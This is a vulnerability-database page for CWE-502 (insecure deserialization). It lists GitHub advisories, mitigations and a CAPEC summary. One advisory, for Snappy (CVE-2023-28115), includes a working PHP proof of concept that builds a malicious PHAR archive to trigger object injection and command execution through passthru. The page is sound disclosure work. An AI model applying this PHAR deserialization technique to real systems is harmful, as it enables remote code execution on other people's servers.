Common Weakness Enumeration

CWE-502

Allowed

Deserialization of Untrusted Data

Abstraction: Base · Status: Draft

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

4795 vulnerabilities reference this CWE, most recent first.

GHSA-GPV7-6398-4J8W

Vulnerability from github – Published: 2023-02-21 00:30 – Updated: 2023-03-02 18:30
VLAI
Details

JD-GUI 1.6.6 allows deserialization via UIMainWindowPreferencesProvider.singleInstance.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-26234"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-02-21T00:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "JD-GUI 1.6.6 allows deserialization via UIMainWindowPreferencesProvider.singleInstance.",
  "id": "GHSA-gpv7-6398-4j8w",
  "modified": "2023-03-02T18:30:28Z",
  "published": "2023-02-21T00:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26234"
    },
    {
      "type": "WEB",
      "url": "https://github.com/java-decompiler/jd-gui/issues/415"
    },
    {
      "type": "WEB",
      "url": "https://github.com/java-decompiler/jd-gui/pull/417"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GPVC-87R4-HFMW

Vulnerability from github – Published: 2026-06-15 21:30 – Updated: 2026-06-15 21:30
VLAI
Details

Unauthenticated PHP Object Injection in Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.1 versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-9691"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-15T21:17:25Z",
    "severity": "CRITICAL"
  },
  "details": "Unauthenticated PHP Object Injection in Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms \u003c= 1.1.1 versions.",
  "id": "GHSA-gpvc-87r4-hfmw",
  "modified": "2026-06-15T21:30:50Z",
  "published": "2026-06-15T21:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9691"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/cf7-active-campaign/vulnerability/wordpress-integration-for-activecampaign-and-contact-form-7-wpforms-elementor-ninja-forms-plugin-1-1-1-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GPX5-7XM4-229W

Vulnerability from github – Published: 2026-05-12 18:30 – Updated: 2026-05-18 20:25
VLAI
Summary
Snorkel MultitaskClassifier.load uses an unsafe torch.load
Details

The snorkel library thru v0.10.0 contains an insecure deserialization vulnerability (CWE-502) in the MultitaskClassifier.load() method of the MultitaskClassifier class. The method loads model weight files using torch.load() without enabling the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted model file, leading to arbitrary code execution on the victim's system when the file is loaded via the vulnerable method.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "snorkel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.10.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31224"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T20:25:02Z",
    "nvd_published_at": "2026-05-12T16:16:14Z",
    "severity": "HIGH"
  },
  "details": "The snorkel library thru v0.10.0 contains an insecure deserialization vulnerability (CWE-502) in the MultitaskClassifier.load() method of the MultitaskClassifier class. The method loads model weight files using torch.load() without enabling the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted model file, leading to arbitrary code execution on the victim\u0027s system when the file is loaded via the vulnerable method.",
  "id": "GHSA-gpx5-7xm4-229w",
  "modified": "2026-05-18T20:25:02Z",
  "published": "2026-05-12T18:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31224"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/snorkel-team/snorkel"
    },
    {
      "type": "WEB",
      "url": "https://www.notion.so/CVE-2026-31224-35d1e1393188814185f3f6db86c9a4e9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Snorkel MultitaskClassifier.load uses an unsafe torch.load"
}

GHSA-GQ6W-Q6WH-JGGC

Vulnerability from github – Published: 2023-03-17 18:24 – Updated: 2023-03-20 13:59
VLAI
Summary
PHAR deserialization allowing remote code execution
Details

Description

snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_exists() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the generateFromHtml() function, it will invoke deserialization.

Proof of Concept

Install Snappy via composer require knplabs/knp-snappy. After that, under snappy directory, create an index.php file with this vulnerable code.

<?php
// index.php

// include autoloader
require __DIR__ . '/vendor/autoload.php';

// reference the snappy namespace
use Knp\Snappy\Pdf;

// vulnerable object
class VulnerableClass {
    public $fileName;
    public $callback;

    function __destruct() {
        call_user_func($this->callback, $this->fileName);
    }
}

$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
// generate pdf from html content and save it at phar://poc.phar
$snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>', 'phar://poc.phar');

As an attacker, we going to generate the malicious phar using this script.

<?php
// generate_phar.php

class VulnerableClass { }
// Create a new instance of the Dummy class and modify its property
$dummy = new VulnerableClass();
$dummy->callback = "passthru";
$dummy->fileName = "uname -a > pwned"; //our payload

// Delete any existing PHAR archive with that name
@unlink("poc.phar");

// Create a new archive
$poc = new Phar("poc.phar");

// Add all write operations to a buffer, without modifying the archive on disk
$poc->startBuffering();

// Set the stub
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");

// Add a new file in the archive with "text" as its content
$poc["file"] = "text";

// Add the dummy object to the metadata. This will be serialized
$poc->setMetadata($dummy);

// Stop buffering and write changes to disk
$poc->stopBuffering();
?>

Then run these command to generate the file

php --define phar.readonly=0 generate_phar.php

Then execute index.php with php index.php. You will see a file named pwned will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.

Impact

This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.

Occurences

https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "knplabs/knp-snappy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-28115"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-17T18:24:24Z",
    "nvd_published_at": "2023-03-17T22:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "## Description\n\nsnappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization.\n\n## Proof of Concept\n\nInstall Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code.\n\n```php\n\u003c?php\n// index.php\n\n// include autoloader\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n// reference the snappy namespace\nuse Knp\\Snappy\\Pdf;\n\n// vulnerable object\nclass VulnerableClass {\n    public $fileName;\n    public $callback;\n\n    function __destruct() {\n        call_user_func($this-\u003ecallback, $this-\u003efileName);\n    }\n}\n\n$snappy = new Pdf(\u0027/usr/local/bin/wkhtmltopdf\u0027);\n// generate pdf from html content and save it at phar://poc.phar\n$snappy-\u003egenerateFromHtml(\u0027\u003ch1\u003eBill\u003c/h1\u003e\u003cp\u003eYou owe me money, dude.\u003c/p\u003e\u0027, \u0027phar://poc.phar\u0027);\n```\n\nAs an attacker, we going to generate the malicious phar using this script.\n\n```php\n\u003c?php\n// generate_phar.php\n\nclass VulnerableClass { }\n// Create a new instance of the Dummy class and modify its property\n$dummy = new VulnerableClass();\n$dummy-\u003ecallback = \"passthru\";\n$dummy-\u003efileName = \"uname -a \u003e pwned\"; //our payload\n\n// Delete any existing PHAR archive with that name\n@unlink(\"poc.phar\");\n\n// Create a new archive\n$poc = new Phar(\"poc.phar\");\n\n// Add all write operations to a buffer, without modifying the archive on disk\n$poc-\u003estartBuffering();\n\n// Set the stub\n$poc-\u003esetStub(\"\u003c?php echo \u0027Here is the STUB!\u0027; __HALT_COMPILER();\");\n\n// Add a new file in the archive with \"text\" as its content\n$poc[\"file\"] = \"text\";\n\n// Add the dummy object to the metadata. This will be serialized\n$poc-\u003esetMetadata($dummy);\n\n// Stop buffering and write changes to disk\n$poc-\u003estopBuffering();\n?\u003e\n```\n\nThen run these command to generate the file\n\n```php\nphp --define phar.readonly=0 generate_phar.php\n```\n\nThen execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.\n\n## Impact\n\nThis vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.\n\n## Occurences\n\n\u003chttps://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\u003e\n\n## References\n\n- \u003chttps://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/\u003e",
  "id": "GHSA-gq6w-q6wh-jggc",
  "modified": "2023-03-20T13:59:30Z",
  "published": "2023-03-17T18:24:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28115"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/pull/469"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/KnpLabs/snappy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
    },
    {
      "type": "WEB",
      "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-gq6w-q6wh-jggc"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PHAR deserialization allowing remote code execution"
}

GHSA-GQ8P-2329-GH3X

Vulnerability from github – Published: 2026-06-23 15:32 – Updated: 2026-06-23 15:32
VLAI
Details

picklescan before 0.0.29 fails to detect malicious pickle files using idlelib.autocomplete.AutoComplete.fetch_completions in reduce methods. Attackers can embed undetected code in pickle files that executes arbitrary commands when loaded by victims.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-71376"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-23T13:16:38Z",
    "severity": "HIGH"
  },
  "details": "picklescan before 0.0.29 fails to detect malicious pickle files using idlelib.autocomplete.AutoComplete.fetch_completions in reduce methods. Attackers can embed undetected code in pickle files that executes arbitrary commands when loaded by victims.",
  "id": "GHSA-gq8p-2329-gh3x",
  "modified": "2026-06-23T15:32:36Z",
  "published": "2026-06-23T15:32:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7cq8-mj8x-j263"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71376"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-undetected-idlelib-autocomplete-autocomplete-fetch-completions"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-GQ8X-F6PQ-64XJ

Vulnerability from github – Published: 2026-06-15 21:30 – Updated: 2026-06-15 21:30
VLAI
Details

Contributor PHP Object Injection in Post Duplicator <= 3.0.10 versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-39474"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-15T21:16:44Z",
    "severity": "HIGH"
  },
  "details": "Contributor PHP Object Injection in Post Duplicator \u003c= 3.0.10 versions.",
  "id": "GHSA-gq8x-f6pq-64xj",
  "modified": "2026-06-15T21:30:44Z",
  "published": "2026-06-15T21:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39474"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/post-duplicator/vulnerability/wordpress-post-duplicator-plugin-3-0-10-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GQ92-WXJV-QQ7G

Vulnerability from github – Published: 2022-05-24 17:22 – Updated: 2022-05-24 17:22
VLAI
Details

Affected versions of Atlassian Jira Server and Data Center allow remote attackers to achieve template injection via the Web Resources Manager. The affected versions are before version 8.8.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-14172"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-74"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-07-03T02:15:00Z",
    "severity": "HIGH"
  },
  "details": "Affected versions of Atlassian Jira Server and Data Center allow remote attackers to achieve template injection via the Web Resources Manager. The affected versions are before version 8.8.1.",
  "id": "GHSA-gq92-wxjv-qq7g",
  "modified": "2022-05-24T17:22:23Z",
  "published": "2022-05-24T17:22:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14172"
    },
    {
      "type": "WEB",
      "url": "https://jira.atlassian.com/browse/JRASERVER-70940"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GQFR-9P6P-C94X

Vulnerability from github – Published: 2023-06-07 03:30 – Updated: 2024-04-04 04:37
VLAI
Details

The GDPR CCPA Compliance Support plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.3 via deserialization of untrusted input "njt_gdpr_allow_permissions" value. This allows unauthenticated attackers to inject a PHP Object.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-36718"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-07T02:15:12Z",
    "severity": "CRITICAL"
  },
  "details": "The GDPR CCPA Compliance Support plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.3 via deserialization of untrusted input \"njt_gdpr_allow_permissions\" value. This allows unauthenticated attackers to inject a PHP Object.",
  "id": "GHSA-gqfr-9p6p-c94x",
  "modified": "2024-04-04T04:37:37Z",
  "published": "2023-06-07T03:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36718"
    },
    {
      "type": "WEB",
      "url": "https://blog.nintechnet.com/gdpr-ccpa-compliance-support-plugin-fixed-insecure-deserialization-vulnerability"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/2408938"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/2411356/ninja-gdpr-compliance"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/ninja-gdpr-compliance/#developers"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/92f1d6fb-c665-419e-a13b-688b1df6c395"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2871261-3231-4a52-9a38-bb3caf461e7d?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GQGX-F6FF-9PPG

Vulnerability from github – Published: 2022-05-13 01:17 – Updated: 2022-05-13 01:17
VLAI
Details

Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have a deserialization of untrusted data vulnerability. Successful exploitation could lead to arbitrary code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-15958"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-09-25T13:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have a deserialization of untrusted data vulnerability. Successful exploitation could lead to arbitrary code execution.",
  "id": "GHSA-gqgx-f6ff-9ppg",
  "modified": "2022-05-13T01:17:37Z",
  "published": "2022-05-13T01:17:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15958"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105313"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1041621"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GQXF-QWCH-9QFR

Vulnerability from github – Published: 2025-03-03 15:31 – Updated: 2026-04-01 18:33
VLAI
Details

Deserialization of Untrusted Data vulnerability in Stiofan Events Calendar for GeoDirectory allows Object Injection. This issue affects Events Calendar for GeoDirectory: from n/a through 2.3.14.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-26967"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-03T14:15:56Z",
    "severity": "HIGH"
  },
  "details": "Deserialization of Untrusted Data vulnerability in Stiofan Events Calendar for GeoDirectory allows Object Injection. This issue affects Events Calendar for GeoDirectory: from n/a through 2.3.14.",
  "id": "GHSA-gqxf-qwch-9qfr",
  "modified": "2026-04-01T18:33:55Z",
  "published": "2025-03-03T15:31:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26967"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/events-for-geodirectory/vulnerability/wordpress-events-calendar-for-geodirectory-plugin-2-3-14-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Mitigation
Implementation

Explicitly define a final object() to prevent deserialization.

Mitigation
Architecture and Design Implementation
  • Make fields transient to protect them from deserialization.
  • An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Implementation

Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.

Mitigation
Architecture and Design Implementation

Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-586: Object Injection

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.